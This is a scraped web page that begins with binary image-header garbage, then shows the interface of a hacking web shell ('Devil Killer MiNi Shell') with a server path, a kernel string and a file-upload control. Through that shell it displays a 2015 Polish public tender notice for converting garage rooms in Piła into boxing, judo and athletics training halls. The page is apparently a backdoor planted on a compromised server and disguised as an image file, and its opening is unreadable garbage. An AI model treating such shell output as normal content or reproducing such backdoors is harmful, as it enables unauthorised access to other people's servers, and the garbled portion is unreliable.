JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150126/10583-N-2015.html

<p class="kh_header"><b>Piła: Przedmiotem zamówienia jest przebudowa pomieszczeń garażowo-gospodarczych na sale szkoleniowe boksu, judo i lekkiej atletyki przy ul. Świteź- Sportowa dz. Nr 115 i 236/6 w Pile.</b><br>
<b>Numer ogłoszenia: 10583 - 2015; data zamieszczenia: 26.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Bydgoska 76, 64-920 Piła, woj. wielkopolskie, tel. 67 2132783, 2142831, faks 67 2132776.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przebudowa pomieszczeń garażowo-gospodarczych na sale szkoleniowe boksu, judo i lekkiej atletyki przy ul. Świteź- Sportowa dz. Nr 115 i 236/6 w Pile..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa pomieszczeń garażowo-gospodarczych na sale szkoleniowe boksu, judo i lekkiej atletyki przy ul. Świteź- Sportowa dz. Nr 115 i 236/6 w Pile.
1) Roboty budowlane:
- sala treningowa - Judo 
Ściany i ścianki, tynki wewnętrzne, podłoża i podsadzki; docieplenie dachu; docieplenie ścian zewnętrznych, stolarka drzwiowa i okienna;
 sala treningowa - Boks
Ściany i ścianki, tynki wewnętrzne, podłoża i podsadzki; stolarka drzwiowa i okienna; docieplenie dachu; docieplenie ścian zewnętrznych .
2) Drogi pieszo jezdne i krawężniki; podłoża i nawierzchnie
3. ROZWIĄZANIA ARCHITEKTONICZNO- BUDOWLANE:
3.1 Fundamenty :- Istniejące ławy fundamentowe- bez zmian
2.2 Izolacje wodochronne:
- izolacje stóp fundamentowych -2x papa asfaltowa,
- izolacja pozioma posadzki na gruncie - 2x folia budowlana gr.0,5 mm,
- izolacja pionowa
-poziome odcięcie izolacji na poziomie 20 cm powyżej terenu.
2.3 Konstrukcja budynku:
-  Budynek wybudowany w technologii tradycyjnej- ściany zewnętrzne i wewnętrzne murowane z betonu komórkowego oraz cegły ceramicznej pełnej, dach w konstrukcji z płyt panwiowych.
- Nadproża stalowe- lokalizacja i poziom montażu podano na rysunkach- wg proj. branżowego
- Ramy stalowe -wg proj. branżowego
Ściany fundamentowe
- Ściany fundamentowe zewnętrzne- istniejące
- Izolacja przeciwwilgociowa od zewnętrznej strony budynku
-  Ściany fundamentowe wewnętrzne- istniejące
Ściany nadziemia
- Ściany zewnętrzne- istniejące murowane z betonu komórkowego oraz cegły ceramicznej pełnej, izolacja termiczna z styropianu gr. 16cm, plus 3 cm styropianu na formowanie pionowych podziałów elewacji, wykończone tynkiem silikatowym, płytami fasadowymi imitującymi drewno- wg rysunków elewacji.
- Ściany wewnętrzne- konstrukcyjne- istniejące- wykończone tynkiem cementowo-wapiennym, pokryte farbą lateksową, lub płytkami ceramicznymi- wg rysunków szczegółowych
- Ściany wewnętrzne- działowe:
a) ciągi komunikacyjne, sale treningowe, pokój trenera, pokój sędziego
-  tynk cem.-wap.
-  ściana murowana z cegły dziurawki lub gazobetonu na zaprawie cementowo-wapiennej . systemowej klejowej.
-  tynk cem.-wap.
b) toalety ogólnodostępne, pomieszczenia higieniczno-sanitarne; murowane

-  płytki ceramiczne
-  tynk cem.-wap.
-  ściana murowana z cegły dziurawki lub gazobetonu na zaprawie cementowo-wapiennej. lub systemowej klejowej.
- ściana murowana  z bloczków silikatowych na zaprawie cementowo- wapiennej lub systemowej klejowej
-  tynk cem.-wap. systemowe ścianki dzielące kabiny ustępowe, systemowe z płyt wiórowych,
laminowanych
c) obudowa szachtów technologicznych-ściana murowana z cegły dziurawki lub gazobetonu na zaprawie cementowo-wapiennej  lub systemowej klejowej.
2.4 Stropodachy
Strop z płyt panwiowych- istniejący. 
- pokrycie zewnętrzne należy zdemontować
- płyty panwiowe należy docieplić dachową wełną mineralną; między wełną mineralną, a stropem umieścić paroizolację.
- zewnętrzną warstwę wodoochronną stanowi folia dachowa PCV.
2.5 Podłogi
Posadzka tradycyjna- na gruncie
-  Skuć istniejącą posadzkę na gruncie.
- Posadzka ułożona na warstwie styropianu podłogowego 
- Pod styropianem wykonać podkład betonowy; między podkładem, a styropianem ułożyć 2 warstwy folii budowlanej.
- Zewnętrzna warstwa wykończeniowa z płytek gresowych i płytek ceramicznych - układane na gładzi cementowej 
- Na istniejącej posadzce w pomieszczeniu kotłowni wykonać podsypkę piaskową i zagęścić.  
Podłoga sportowa
- Skuć istniejącą posadzkę na gruncie.
- Posadzka ułożona na warstwie styropianu podłogowego; pod styropianem wykonać podkład betonowy grubości 15cm.
- Na warstwę styropianu podłogowego wylać gładź cementową.
- Między podkładem, a styropianem ułożyć 2 warstwy folii budowlanej; na warstwie gładzi cementowej, położyć warstwę elastycznej pianki  i dwie warstwy legarów  płytę wiórową; podłogę należy wykończyć wykładziną sportową PCV.
2.6 Wentylacja
- Grawitacyjna:
W pomieszczeniach technicznych, gospodarczych, pomocniczych, toaletach, pom. masażu, pokoju trenera i sędziego zaprojektowano wentylację grawitacyjną opartą o kształtki wentylacyjne typu Schiedel lub równoważne. W pomieszczeniach z wentylacją grawitacyjną montować drzwi z kratką nawiewną.
W pomieszczeniach bez okien- wentylacja grawitacyjna wspomagana.
- Mechaniczna:
W pomieszczeniach sal treningowych, szatniach oraz pomieszczeniach higieniczno-sanitarnych zaprojektowano wentylację mechaniczną- nawiewno-wywiewną.
2.7 Stolarka:
Stolarka drzwiowa
Drzwi zewnętrzne:
-  wejściowe do budynku- część boksu i judo- wykonać z profili aluminiowych izolowanych termicznie. Szklenie wykonać szkłem z powłoką odbijającą refleks, szkłem bezpiecznym o współczynniku  przenikania ciepła U=1,1 W/(m2xK). Profile malować proszkowo w kolorze grafitowym,
- do kotłowni-stalowe, pełne w ościeżnicy kątowej, malowane proszkowo, 
- do magazynów-stalowe z kratką nawiewną, w ościeżnicy kątowej, malowane proszkowo .
Drzwi wewnętrzne:
Ścianki i drzwi aluminiowe-manualne-wykonać z profili aluminiowych nie izolowanych termicznie.
Profile malować proszkowo w kolorze szarym. Szklenie szkłem bezpiecznym. Wyposażone w zamki cylindryczne oraz blokadę w pozycji otwartej
-  do pomieszczeń socjalnych- pełne płycinowe w ościeżnicach obejmujących-regulowanych lub 
kątowych, 
-  w toaletach, pomieszczeniach higieniczno-sanitarnych z wentylacją grawitacyjną- drzwi z okuciami łazienkowymi otworami wentylacyjnymi, 
- do sali boksu, siłowni, sal treningowych- wykonać z profili aluminiowych, nie izolowanych termicznie, profile malować proszkowo
Stolarka okienna
Okna PCV, szklenie wykonać szkłem z barwioną powłoką odbijającą- refleks, bezpiecznym o współczynniku przenikania ciepła U=1,1 W/(m2xK). Ramy w kolorze szarym .
2.8 Wycieraczki
Przed głównymi wejściami (do części boksu, judo) montować wycieraczki stalowe skrzynkowe wpuszczane.
2.9 Sufity podwieszane
- sufit rastrowy,
- sufit z płyty gipsowo-kartonowej.
2.10 Rury spustowe
Woda z dachów odprowadzana poprzez otwory przelewowe przeprowadzone przez ścianki
attykowe połączone z koszem przelewowym. 
3.0 WYKOŃCZENIE WEWNĘTRZNE I ZEWNĘTRZNE
3.1 Wykończenie wewnętrzne
. Posadzki/podłogi:
Wykończenie podłóg w:
a) W pomieszczeniach komunikacji ogólnodostępnej oraz toaletach ogólnodostępnych- płytki gresowe; 
b) pomieszczeniach szatni, pom. higieniczno-sanitarnych, kotłowni, pomieszczenia masażu, pom. pomocnicze, pom. gospodarcze, pokój trenera, pokój sędziego- płytki ceramiczne;
c/ salach treningowych, siłowni, magazynach- wykładzina pcv- wybór w zakresie własnym.
Ściany
- pomieszczenia sal treningowych, pokój trenera, pokój sędziego: tynki silikatowe- malowane farbą akrylową (lateksową),
- w szatni, pomieszczeniach socjalnych, pom. higieniczno-sanitarnym, pom. gospodarczych oraz toaletach ogólnodostępnych- płytki ceramiczne do poziomu +2,20; powyżej malowanie farbą akrylową (lateksową).
Sufity
-podwieszane: rastrowe, z płyty gipsowo-kartonowej- pokryte farbą lateksową w kolorze białym.
3.2 Wykończenie zewnętrzne:
- cokół: tynk silikatowy malowany zgodnie z kolorystyką elewacji w kolorze: szary,
- tynk silikatowy malowany zgodnie z kolorystyką elewacji w kolorze białym
- tynk silikatowy w kolorze szarym,
- okna PCV
- drzwi w profilach aluminiowych,
- bramy do magazynów malowane proszkowo w kolorze szarym.
- płyty fasadowe HPL pokryte naturalna okleiną imitującą drewno-kolor orzech naturalny montowane w układzie poziomym.
- obróbki blacharskie- blacha tytan cynk- kolor szary, kolor brązowy w okleinie drewnopodobnej- orzech naturalny, parapety kolor zbliżony do koloru stolarki okiennej, .
 Uwagi
Wszystkie użyte w niniejszej dokumentacji nazwy producentów są przykładowe i mają na celu wyłącznie wskazanie standardu jakościowego przyjętych rozwiązań. W procesie realizacji możliwe jest zastosowanie produktów dowolnej firmy, równorzędnych technicznie, o takich samych parametrach, pod warunkiem zachowania standardu jakościowego, wytrzymałościowego itp. nie gorszego niż przywołany w dokumentacji. Zamontowane urządzenia i przyjęte rozwiązania powinny spełniać wymagania norm PN-EN 1176, PN-EN 1177 oraz posiadać odpowiednie certyfikaty i atesty.
Ewentualne zmiany projektowe spowodowane różnicą zastosowanego w wyniku przetargu produktu, materiału obciążają wykonawcę.
4. Instalacja elektryczna i teletechniczna
Do wykonawcy robót elektrycznych należy:
- dostawa kompletnych rozdzielnic wraz z ustawieniem, regulacją i uruchomieniem
- dostawa i ułożenie elektroenergetycznych kabli i przewodów zasilających do rozdzielnic
- dostawa i ułożenie kabli i przewodów odpływowych
- pomiary rozdzielnic.
- montaż drabinek i koryt kablowych
- wykonanie bruzd
- dostawa kabli i przewodów
- ułożenie kabli i przewodów
- pomiary kabli i przewodów
- dostawa opraw i łączników
- przygotowanie podłoża pod zamontowane oprawy
- montaż opraw i łączników
- pomiary elektryczne opraw
- montaż urządzeń sterujących oświetleniem awaryjnym
- wykonanie otworów w ścianach dla osadzenia puszek
- montaż puszek podtynkowych

5. Instalacja sanitarna
W skład niniejszej części wchodzą następujące roboty:
-roboty ziemne
-montaż rurociągów, osprzętu i elementów montażowych do armatury,
-montaż armatury sanitarnej,
-roboty przygotowawcze i wykończeniowe.
a) dla instalacji kanalizacji sanitarnej:
-montaż rurociągów kanalizacji sanitarnej w posadzce,
-montaż rurociągów kanalizacji sanitarnej (poziomy i piony),
-montaż zaworów powietrznych
-montaż rewizji,
-montaż przejść przez ściany i stropy,
-montaż syfonów powietrznych.
-montaż wywiewek dachowych
b) dla przyborów sanitarnych:
- montaż stelaży ze spłuczka podtynkową,
- montaż miski ustępowej wiszącej,
- montaż deski ustępowej,
- montaż pisuaru,
- montaż brodzików ,
- montaż wpustów ściekowych,
- montaż wpustów podłogowych,
-  montaż zlewozmywaków,
- montaż syfonów zlewozmywakowych,
- montaż przyborów sanitarnych dla niepełnosprawnych
c) instalacji zimnej i ciepłej wody
W skład niniejszej części wchodzą następujące roboty:
- montaż rurociągów prowadzonych w posadzkach i bruzdach oraz podwieszanych sufitach
- montaż zaworów odcinających
- płukanie i próby szczelności
- montaż armatury czerpalnej
- montaż izolacji dla rurociągów
- montaż przejść przez ściany i stropy.
d) instalacja wentylacji mechanicznej i klimatyzacji
W skład niniejszej części wchodzą następujące roboty:
- montaż central nawiewno-wywiewnej podwieszanej z wymiennikami krzyżowymi,
- montaż wentylatorów dachowych
- montaż przewodów wentylacyjnych okrągłych i prostokątnych
- montaż czerpni i wyrzutni wyprowadzonych na dach
- montaż osprzętu wentylacyjnego (nawiewników, wywiewników, tłumików, przepustnic)
- montaż izolacji akustycznej i termicznej kanałów.
Szczegółowy opis przedmiotu zamówienia zawierają Specyfikacje Techniczne Wykonania i Odbioru Robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.22.20-4, 45.21.22.21-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 18000  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy roboty o podobnym charakterze o wartości nie mniejszej niż 600 000 zł brutto każda z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót wydanych przez podmiot na rzecz którego roboty budowlane zostały wykonane określających czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia następującymi osobami: 
- co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno- budowlanej, która będzie pełniła funkcję kierownika budowy posiadającą co najmniej 5 letnie doświadczenie zawodowe po uzyskaniu uprawnień;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że:posiada 
- środki finansowe lub zdolność kredytową w wysokości co najmniej  600 000 zł;
- polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 1 000 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy
1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru oferty.
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a) konieczność przedłużenia (zmiany) terminu umownego oraz harmonogramu rzeczowo-finansowego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności o czas trwania działania siły wyzszej,
- wyjątkowo niesprzyjających warunków fizycznych; bądź atmosferycznych o czas trwania tych warunków,
- nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których zamawiający nie mógł przewidzieć w chwili zawarcia umowy o czas trwania tych zadrzeń,
- decyzji służb Nadzoru budowlanego mających wpływ na przesunięcie terminu realizacji robót takich jak wstrzymanie budowy, o czas na jaki roboty zostały wstrzymane, 
- wystąpienia zamówień dodatkowych w rozumieniu ustawy Prawo zamówień publicznych, niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia,
b)  zmiana przedstawicieli uczestników procesu inwestycyjnego w przypadku:
- zmiany kierownika budowy w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy, pod warunkiem przedstawienia w jego zastępstwie osoby posiadającej odpowiednie uprawnienia, zgodnie z warunkami określonymi w Specyfikacji Istotnych Warunków Zamówienia,
d) wprowadzenie lub zmiana podwykonawcy dot. zakresu robót przeznaczonych do wykonania przez podwykonawcę, pomimo, że w ofercie opracowanej na potrzeby postępowania prowadzonego, Wykonawca nie przedstawił zakresu robót, który powierzy podwykonawcom, w przypadku wystąpienia zmian w tym zakresie,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
